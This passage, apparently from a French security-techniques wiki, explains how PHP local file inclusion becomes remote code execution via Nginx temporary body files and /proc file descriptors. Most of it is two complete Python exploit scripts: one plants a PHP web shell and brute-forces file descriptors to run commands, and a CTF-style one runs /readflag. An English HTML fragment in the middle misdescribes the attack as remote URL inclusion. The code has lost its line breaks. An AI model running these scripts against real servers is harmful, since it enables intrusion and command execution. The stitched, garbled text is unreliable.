Heureusement, PHP est actuellement souvent déployé via PHP-FPM et Nginx. Nginx offre une fonctionnalité client body buffering facilement négligée qui écrira des fichiers temporaires si le corps du client (pas limité à post) est plus grand qu'un certain seuil.
Cette fonctionnalité permet d'exploiter les LFIs sans aucun autre moyen de créer des fichiers, si Nginx s'exécute en tant que même utilisateur que PHP (très couramment fait en tant que www-data).
Il est visible que le fichier temporaire est immédiatement dissocié après avoir été ouvert par Nginx. Heureusement, procfs peut être utilisé pour obtenir toujours une référence vers le fichier supprimé via une course :
Note : On ne peut pas inclure directement /proc/34/fd/15 dans cet exemple car la fonction include de PHP résoudrait le chemin en /var/lib/nginx/body/0000001368 (supprimé) qui n'existe pas dans le système de fichiers. Cette légère restriction peut heureusement être contournée par une certaine indirection comme : /proc/self/fd/34/../../../34/fd/15 qui exécutera finalement le contenu du fichier supprimé /var/lib/nginx/body/0000001368.
Exploit Complet
#!/usr/bin/env python3import sys, threading, requests# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for detailsURL =f'http://{sys.argv[1]}:{sys.argv[2]}/'# find nginx worker processesr = requests.get(URL, params={'file': '/proc/cpuinfo'})cpus = r.text.count('processor')r = requests.get(URL, params={'file': '/proc/sys/kernel/pid_max'})pid_max =int(r.text)print(f'[*] cpus: {cpus}; pid_max: {pid_max}')nginx_workers = []for pid inrange(pid_max):r = requests.get(URL, params={'file': f'/proc/{pid}/cmdline'})ifb'nginx: worker process'in r.content:print(f'[*] nginx worker found: {pid}')nginx_workers.append(pid)iflen(nginx_workers)>= cpus:breakdone =False# upload a big client body to force nginx to create a /var/lib/nginx/body/$Xdefuploader():print('[+] starting uploader')whilenot done:requests.get(URL, data='<?php system($_GET["c"]); /*'+16*1024*'A')for _ inrange(16):t = threading.Thread(target=uploader)t.start()# brute force nginx's fds to include body files via procfs# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`defbruter(pid):global donewhilenot done:print(f'[+] brute loop restarted: {pid}')for fd inrange(4, 32):f =f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'r = requests.get(URL, params={'file': f,'c': f'id'})if r.text:print(f'[!] {f}: {r.text}')done =Trueexit()for pid in nginx_workers:a = threading.Thread(target=bruter, args=(pid, ))a.start()
<h1>Local File Inclusion to Remote Code Execution via Nginx Temporary Files</h1><p>In some cases, Nginx can be misconfigured to store temporary files in a directory that is writable by the web server user. This misconfiguration can be exploited to achieve remote code execution by including a crafted file that will be executed by the server.</p><h2>Exploitation</h2><p>To exploit this vulnerability, an attacker can create a malicious PHP file containing the desired code and host it on a server. The attacker then includes the URL of the malicious file in a request to the vulnerable application, which in turn includes the file and executes the code within it.</p><h2>Prevention</h2><p>To prevent this type of attack, ensure that Nginx is properly configured to store temporary files in a directory that is not writable by the web server user. Additionally, input validation and output encoding should be implemented to prevent malicious file inclusions.</p>
import requestsimport threadingimport multiprocessingimport threadingimport randomSERVER ="http://localhost:8088"NGINX_PIDS_CACHE =set([34, 35, 36, 37, 38, 39, 40, 41])# Set the following to True to use the above set of PIDs instead of scanning:USE_NGINX_PIDS_CACHE =Falsedefcreate_requests_session():session = requests.Session()# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overheadadapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)session.mount('http://', adapter)return sessiondefget_nginx_pids(requests_session):if USE_NGINX_PIDS_CACHE:return NGINX_PIDS_CACHEnginx_pids =set()# Scan up to PID 200for i inrange(1, 200):cmdline = requests_session.get(SERVER +f"/?action=read&file=/proc/{i}/cmdline").textif cmdline.startswith("nginx: worker process"):nginx_pids.add(i)return nginx_pidsdefsend_payload(requests_session,body_size=1024000):try:# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fastpayload ='<?php system("/readflag"); ?> //'requests_session.post(SERVER +"/?action=read&file=/bla", data=(payload + ("a"* (body_size -len(payload)))))except:passdefsend_payload_worker(requests_session):whileTrue:send_payload(requests_session)defsend_payload_multiprocess(requests_session):# Use all CPUs to send the payload as request body for Nginxfor _ inrange(multiprocessing.cpu_count()):p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))p.start()defgenerate_random_path_prefix(nginx_pids):# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/rootpath =""component_num = random.randint(0, 10)for _ inrange(component_num):pid = random.choice(nginx_pids)if random.randint(0, 1)==0:path +=f"/proc/{pid}/cwd"else:path +=f"/proc/{pid}/root"return pathdefread_file(requests_session,nginx_pid,fd,nginx_pids):nginx_pid_list =list(nginx_pids)whileTrue:path =generate_random_path_prefix(nginx_pid_list)path +=f"/proc/{nginx_pid}/fd/{fd}"try:d = requests_session.get(SERVER +f"/?action=include&file={path}").textexcept:continue# Flags are formatted as hxp{<flag>}if"hxp"in d:print("Found flag! ")print(d)defread_file_worker(requests_session,nginx_pid,nginx_pids):# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this rangefor fd inrange(10, 45):thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))thread.start()defread_file_multiprocess(requests_session,nginx_pids):for nginx_pid in nginx_pids:p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))p.start()if__name__=="__main__":print('[DEBUG] Creating requests session')requests_session =create_requests_session()print('[DEBUG] Getting Nginx pids')nginx_pids =get_nginx_pids(requests_session)print(f'[DEBUG] Nginx pids: {nginx_pids}')print('[DEBUG] Starting payload sending')send_payload_multiprocess(requests_session)print('[DEBUG] Starting fd readers')read_file_multiprocess(requests_session, nginx_pids)